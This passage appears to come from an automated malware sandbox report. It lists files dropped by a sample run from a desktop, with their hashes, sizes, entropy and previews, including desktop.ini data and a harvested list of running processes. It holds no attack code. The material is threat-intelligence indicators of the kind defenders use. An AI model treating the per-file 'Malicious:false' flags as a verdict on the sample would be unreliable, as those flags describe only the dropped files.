                                                                                                                                                            SSDEEP:24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
                                                                                                                                                            MD5:A01E6B89B2F69F2DA25CB28751A6261C
                                                                                                                                                            SHA1:48C11C0BECEB053F3DB16EC43135B20360E77E9B
                                                                                                                                                            SHA-256:0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
                                                                                                                                                            SHA-512:1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701796197804446
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                            MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                            SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                            SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                            SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.696835919052288
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                                                                            MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                                                                            SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                                                                            SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                                                                            SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694142261581685
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                                                                            MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                                                                            SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                                                                            SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                                                                            SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694142261581685
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                                                                            MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                                                                            SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                                                                            SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                                                                            SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):402
                                                                                                                                                            Entropy (8bit):3.493087299556618
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                                                                                                                            MD5:ECF88F261853FE08D58E2E903220DA14
                                                                                                                                                            SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                                                                                                                            SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                                                                                                                            SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.68639364218091
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
                                                                                                                                                            MD5:1D78D2A3ECD9D04123657778C8317C4E
                                                                                                                                                            SHA1:3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
                                                                                                                                                            SHA-256:88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
                                                                                                                                                            SHA-512:7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.696563923881884
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:5/VaDtnzLQ+f43tOT8I+KwurMekIRdXEt5L3tYor2Xp2CpvirtyrRofz/:hVaDQ3t9I+AFlXE7L3yLprvMEaD
                                                                                                                                                            MD5:CD90073A050D84BFC07DF7516A76BE8F
                                                                                                                                                            SHA1:5BA173F226A697FF62B1208D33B3BACA3B2EFC1D
                                                                                                                                                            SHA-256:8E77CEDA3994BC3AD371B51807B7B77A08F2F5A3A232C0991C4763C9B2E78E13
                                                                                                                                                            SHA-512:A07B25F8DB5B2E680122920BBDCFB6138ACD8856F203A447ED6E63E2411388567CC7ADB1C2DC2F9B87C7DCFD9671D1EAC8CB9FF9BB10677806755D739478C328
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694921863932654
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:IrXCbQfFinplOQLb3PE8zc+qQtqXyXp0KS5bvAcIFZD/:ITCbWiplOQHXzddmyC5LkN/
                                                                                                                                                            MD5:62949C1D490A67816174BD0CD1F9264D
                                                                                                                                                            SHA1:1F3D8262179A769CDCCECE24AAAC12384E1C3F26
                                                                                                                                                            SHA-256:DD2EED4F65D047B47F0BA09DF3A4CB1AEF399952780B8011D07C7F800CFDCC89
                                                                                                                                                            SHA-512:7E067C700CD325164E580CF6BF383042143332F6E2AE57D422A676C4D50E39712FF0BBE0DBC674BDDD89EBDA26068F076AD2999811F7A171CE77F95566186807
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.698695541849584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
                                                                                                                                                            MD5:64E7020B0B401F75D3061A1917D99E04
                                                                                                                                                            SHA1:785E09A2F76464E26CE282F41DE07D1B27FFB855
                                                                                                                                                            SHA-256:9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
                                                                                                                                                            SHA-512:14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.698695541849584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
                                                                                                                                                            MD5:64E7020B0B401F75D3061A1917D99E04
                                                                                                                                                            SHA1:785E09A2F76464E26CE282F41DE07D1B27FFB855
                                                                                                                                                            SHA-256:9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
                                                                                                                                                            SHA-512:14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694579526837108
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
                                                                                                                                                            MD5:2DB1C5AA015E3F413D41884AC02B89BC
                                                                                                                                                            SHA1:4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
                                                                                                                                                            SHA-256:956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
                                                                                                                                                            SHA-512:C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694574194309462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                            MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                            SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                            SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                            SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.695900624002646
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:55kzf0ILfo2TdftHFyQ9yi5pS2+w9gHtKgqin5q+GzA0Kb08Vb5nY1NLIeukWg/w:56zcILlTxtX9j5TijGzVURS5IBgSGVny
                                                                                                                                                            MD5:BC4419B8B9970FEDCD704610C64179B0
                                                                                                                                                            SHA1:71BD107584E1CFC5E5E75F765C064FC13228BC96
                                                                                                                                                            SHA-256:A2115F382834559DCAB7139CB455FEFBEBBF07B89E2B4B8CFA3DC152491DAC1F
                                                                                                                                                            SHA-512:454E3C24F975C0F56F152D24D32C544918CC7663B01CC50C717FAD082B201D4265DA9C5808AFA58573BC104AB739330AEAD49156FA7E7419B3D7CE130EAF3142
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.690474000177721
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
                                                                                                                                                            MD5:A01E6B89B2F69F2DA25CB28751A6261C
                                                                                                                                                            SHA1:48C11C0BECEB053F3DB16EC43135B20360E77E9B
                                                                                                                                                            SHA-256:0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
                                                                                                                                                            SHA-512:1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701796197804446
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                            MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                            SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                            SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                            SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:HIT archive data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.680710927136183
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:VYQPeqnSuHRl1G4WOFR8oWZjan0aoAqQ0TSudRWA9qAGD0:VYQPXRl1FWOr89xN0qQwS2b40
                                                                                                                                                            MD5:C638B1D291F5DDC3F5007F5E51345CB1
                                                                                                                                                            SHA1:56AEE241589380F48AADB1A7EA88D0C68BE9FF9F
                                                                                                                                                            SHA-256:A6AE84E0618A8785E1B92D24489E69607A71DD3FC657FBD4EBACEA00B33A71B5
                                                                                                                                                            SHA-512:289AEE36191CE86D62B38B0253B42AEB732F66A58C57F990B48F45F21F280F355C52A3690129DC1CE5EA039D7A854C8AD63D8A8F3B83752031610332785DDF5B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.696835919052288
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                                                                            MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                                                                            SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                                                                            SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                                                                            SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694142261581685
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                                                                            MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                                                                            SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                                                                            SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                                                                            SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):282
                                                                                                                                                            Entropy (8bit):3.5191090305155277
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                                                                                                                            MD5:3A37312509712D4E12D27240137FF377
                                                                                                                                                            SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                                                                                                                            SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                                                                                                                            SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):190
                                                                                                                                                            Entropy (8bit):3.5497401529130053
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                                                                                                            MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                                                                                                            SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                                                                                                            SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                                                                                                            SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):504
                                                                                                                                                            Entropy (8bit):3.514398793376306
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                                                                                                            MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                                                                                                            SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                                                                                                            SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                                                                                                            SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):17713
                                                                                                                                                            Entropy (8bit):5.691617069955551
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:43S73XO9PWkEYTkCeckdk4kKkv5GxjEjl5tXkMktcktgdUN7q0kmInqqfQNNRIyr:1jm5A/EyKCv2oqlO
                                                                                                                                                            MD5:91CDA8E4D17263CC955811367770EEC0
                                                                                                                                                            SHA1:9C8BB0B46C4E8665AD0C7A6A389306EDA661C5F5
                                                                                                                                                            SHA-256:349522C468BE2C4ADB7F20CF3751CD00D1E4A6150BDEE7B5F74729B1CB4CA291
                                                                                                                                                            SHA-512:F4DEAD8567B73BC8039312BA7B5DA6ECA0BC1C892186DDCC6E188BBE18A9F4607BC10457A680C95D20707F4415424ABAD2B140F8637172D516808489A871CA80
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NAME: svchost..PID: 860..EXE: c:\windows\system32\svchost.exe..NAME: svchost..PID: 2152..EXE: c:\windows\system32\svchost.exe..NAME: svchost..PID: 1716..EXE: c:\windows\system32\svchost.exe..NAME: svchost..PID: 3868..EXE: c:\windows\system32\svchost.exe..NAME: tXfiegClAfqDEuXWI..PID: 6452..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: backgroundTaskHost..PID: 416..EXE: C:\Windows\system32\backgroundTaskHost.exe..NAME: svchost..PID: 3000..EXE: c:\windows\system32\svchost.exe..NAME: tXfiegClAfqDEuXWI..PID: 6016..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: ShellExperienceHost..PID: 3860..EXE: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe..NAME: tXfiegClAfqDEuXWI..PID: 3424..EXE: C:\Program Files (x86)\riPhdaaOqQrMXRaBlMKFtJHOHLeQXvSXpBfJcQjBzwYvMJSJHPnkCNfamyrFytHbtif\tXfiegClAfqDEuXWI.exe..NAME: s
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):29
